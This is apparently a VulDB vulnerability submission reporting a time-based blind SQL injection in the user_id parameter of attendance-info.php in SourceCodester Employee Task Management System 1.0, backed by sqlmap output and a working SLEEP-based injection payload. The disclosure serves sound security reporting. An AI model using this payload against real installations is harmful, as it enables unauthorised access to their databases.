Submission #299164 (Info): SourceCodester Employee Task Management System v 1.0 SQL Injection in param user_id in POST attendance-info.php

Title: SourceCodester Employee Task Management System v 1.0 SQL Injection in param user_id in POST attendance-info.php
Description: SQL Injection in param user_id in POST attendance-info.php

[20:19:33] [INFO] POST parameter 'user_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:19:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:19:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:19:44] [INFO] checking if the injection point on POST parameter 'user_id' is a false positive
[20:20:37] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
POST parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: user_id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_id=1' AND (SELECT 5903 FROM (SELECT(SLEEP(5)))hTDS) AND 'gCuQ'='gCuQ&add_punch_in=
---
[20:21:13] [INFO] the back-end DBMS is MySQL
[20:21:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web application technology: Apache 2.4.54, PHP 7.4.30
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Source: https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md
User: huutuanbg97 (UID 45015)
Submitted: 2024-03-15 14:34 (2 years ago)
Moderation: 2024-03-16 07:14 (17 hours later)
Status: Accepted
VulDB Entry: 257055 [SourceCodester Employee Task Management System 1.0 attendance-info.php user_id SQL Injection]
Points: 20
